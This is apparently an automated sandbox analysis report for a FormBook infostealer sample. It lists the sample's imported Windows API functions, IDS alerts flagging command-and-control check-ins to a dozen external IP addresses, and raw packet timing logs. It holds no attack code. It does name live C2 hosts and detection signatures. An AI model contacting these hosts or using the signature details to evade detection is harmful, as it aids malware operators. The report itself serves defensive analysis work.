USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-19T04:29:45.770188+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61909 | 80 | 192.168.2.4 | 104.21.45.56
2024-08-19T04:27:15.619235+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49742 | 80 | 192.168.2.4 | 208.91.197.27
2024-08-19T04:26:45.953305+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49737 | 80 | 192.168.2.4 | 217.160.0.106
2024-08-19T04:29:43.220807+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61908 | 80 | 192.168.2.4 | 104.21.45.56
2024-08-19T04:28:59.083931+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61898 | 80 | 192.168.2.4 | 199.192.19.19
2024-08-19T04:25:50.548648+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61910 | 80 | 192.168.2.4 | 104.21.45.56
2024-08-19T04:26:51.139925+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49739 | 80 | 192.168.2.4 | 217.160.0.106
2024-08-19T04:28:08.800729+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61889 | 80 | 192.168.2.4 | 194.9.94.85
2024-08-19T04:26:30.209134+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49736 | 80 | 192.168.2.4 | 5.44.111.162
2024-08-19T04:28:45.803748+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61894 | 80 | 192.168.2.4 | 23.251.54.212
2024-08-19T04:28:03.640634+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61887 | 80 | 192.168.2.4 | 194.9.94.85
2024-08-19T04:27:18.166411+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49743 | 80 | 192.168.2.4 | 208.91.197.27
2024-08-19T04:28:23.394049+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61893 | 80 | 192.168.2.4 | 23.251.54.212
2024-08-19T04:29:18.369749+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61903 | 80 | 192.168.2.4 | 91.195.240.19
2024-08-19T04:26:48.524707+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49738 | 80 | 192.168.2.4 | 217.160.0.106
2024-08-19T04:29:26.074038+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61906 | 80 | 192.168.2.4 | 91.195.240.19
2024-08-19T04:29:12.619341+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61902 | 80 | 192.168.2.4 | 213.145.228.16
2024-08-19T04:26:53.621214+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49741 | 80 | 192.168.2.4 | 217.160.0.106
2024-08-19T04:28:20.846261+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61892 | 80 | 192.168.2.4 | 23.251.54.212
2024-08-19T04:28:56.555569+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61897 | 80 | 192.168.2.4 | 199.192.19.19
2024-08-19T04:28:06.168191+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61888 | 80 | 192.168.2.4 | 194.9.94.85
2024-08-19T04:28:53.995546+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61896 | 80 | 192.168.2.4 | 199.192.19.19
2024-08-19T04:27:46.320412+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61885 | 80 | 192.168.2.4 | 43.252.167.188
2024-08-19T04:28:11.205183+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61890 | 80 | 192.168.2.4 | 194.9.94.85
2024-08-19T04:29:23.565167+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61905 | 80 | 192.168.2.4 | 91.195.240.19
2024-08-19T04:29:40.691998+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61907 | 80 | 192.168.2.4 | 104.21.45.56
2024-08-19T04:27:41.892608+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61883 | 80 | 192.168.2.4 | 43.252.167.188
2024-08-19T04:28:51.482298+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61895 | 80 | 192.168.2.4 | 199.192.19.19
2024-08-19T04:27:20.693670+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49744 | 80 | 192.168.2.4 | 208.91.197.27
2024-08-19T04:27:24.986327+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49745 | 80 | 192.168.2.4 | 208.91.197.27
2024-08-19T04:27:57.855403+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 61886 | 80 | 192.168.2.4 | 43.252.167.188
2024-08-19T04:29:07.504399+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61900 | 80 | 192.168.2.4 | 213.145.228.16
2024-08-19T04:29:10.035756+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61901 | 80 | 192.168.2.4 | 213.145.228.16
2024-08-19T04:27:44.424571+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61884 | 80 | 192.168.2.4 | 43.252.167.188
2024-08-19T04:29:04.930341+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61899 | 80 | 192.168.2.4 | 213.145.228.16
2024-08-19T04:28:18.314367+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61891 | 80 | 192.168.2.4 | 23.251.54.212
2024-08-19T04:29:20.919756+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 61904 | 80 | 192.168.2.4 | 91.195.240.19
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 19, 2024 04:26:29.502394915 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
Aug 19, 2024 04:26:29.507535934 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
Aug 19, 2024 04:26:29.507661104 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
Aug 19, 2024 04:26:29.510755062 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
Aug 19, 2024 04:26:29.515681982 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
Aug 19, 2024 04:26:30.208937883 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
Aug 19, 2024 04:26:30.209012985 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
Aug 19, 2024 04:26:30.209134102 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
Aug 19, 2024 04:26:30.213121891 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
Aug 19, 2024 04:26:30.218030930 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
Aug 19, 2024 04:26:45.275054932 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:45.279987097 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:45.280128956 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:45.282705069 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:45.287636995 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:45.953080893 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:45.953202963 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:45.953305006 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:46.798593998 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:47.818336964 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:47.823282003 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:47.823388100 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:47.825927019 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:47.830943108 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:48.524555922 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:48.524626970 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:48.524707079 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:49.340961933 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:50.349441051 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:50.354532003 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.354650974 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:50.357610941 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:50.362590075 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362620115 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362672091 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362699986 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362725973 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362775087 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362802029 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362847090 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:50.362874031 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:51.139810085 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:51.139847994 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:51.139925003 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:51.864989042 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:52.947217941 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:52.952446938 CEST | 80 | 49741 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:52.952541113 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:52.966120958 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:52.971066952 CEST | 80 | 49741 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:53.620855093 CEST | 80 | 49741 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:53.621151924 CEST | 80 | 49741 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:26:53.621213913 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:53.624502897 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.106
Aug 19, 2024 04:26:53.630100012 CEST | 80 | 49741 | 217.160.0.106 | 192.168.2.4
Aug 19, 2024 04:27:15.144103050 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:15.148960114 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:15.149051905 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:15.151654959 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:15.156450987 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:15.619090080 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:15.619235039 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:16.658363104 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:16.664901972 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:17.677784920 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:17.682990074 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:17.683125973 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:17.685692072 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:17.694739103 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:18.166321039 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:18.166410923 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:19.189441919 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:19.198913097 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.211075068 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:20.216212034 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.216295958 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:20.219614983 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:20.224463940 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224601030 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224630117 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224678040 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224704981 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224844933 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224873066 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224903107 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.224982023 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.693571091 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:20.693670034 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:21.781035900 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:21.786087036 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:22.786977053 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:22.792057991 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:22.793926001 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:22.796072006 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:22.800940990 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986201048 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986253023 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986310005 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986326933 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:24.986341953 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986373901 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:24.986453056 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:24.990941048 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
Aug 19, 2024 04:27:24.995771885 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
Aug 19, 2024 04:27:40.371058941 CEST | 61883 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:40.375986099 CEST | 80 | 61883 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:40.376070976 CEST | 61883 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:40.378794909 CEST | 61883 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:40.383699894 CEST | 80 | 61883 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:41.892607927 CEST | 61883 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:41.939672947 CEST | 80 | 61883 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:42.910325050 CEST | 61884 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:42.915425062 CEST | 80 | 61884 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:42.915508032 CEST | 61884 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:42.917068958 CEST | 61884 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:42.922360897 CEST | 80 | 61884 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:43.994921923 CEST | 80 | 61883 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:43.994997025 CEST | 61883 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:44.424571037 CEST | 61884 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:44.475543022 CEST | 80 | 61884 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.447709084 CEST | 61885 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:45.454567909 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.455224037 CEST | 61885 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:45.457448006 CEST | 61885 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:45.463638067 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.463668108 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.463732004 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.463758945 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.463785887 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.464318991 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.464345932 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.464391947 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:45.464440107 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:46.320158958 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:46.320336103 CEST | 80 | 61885 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:46.320411921 CEST | 61885 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:46.971837997 CEST | 61885 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:47.989983082 CEST | 61886 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:47.995187044 CEST | 80 | 61886 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:47.995266914 CEST | 61886 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:47.997513056 CEST | 61886 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:48.002602100 CEST | 80 | 61886 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:52.484155893 CEST | 80 | 61884 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:52.484225035 CEST | 61884 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:57.855218887 CEST | 80 | 61886 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:57.855305910 CEST | 80 | 61886 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:27:57.855402946 CEST | 61886 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:57.858546019 CEST | 61886 | 80 | 192.168.2.4 | 43.252.167.188
Aug 19, 2024 04:27:57.863387108 CEST | 80 | 61886 | 43.252.167.188 | 192.168.2.4
Aug 19, 2024 04:28:02.957212925 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:02.962146997 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:02.962327957 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:02.964535952 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:02.969352961 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640505075 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640563011 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640599012 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640630960 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640634060 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:03.640666008 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640697956 CEST | 80 | 61887 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:03.640727997 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:03.640758038 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:04.471007109 CEST | 61887 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:05.491864920 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:05.496931076 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:05.497035980 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:05.499008894 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:05.503915071 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
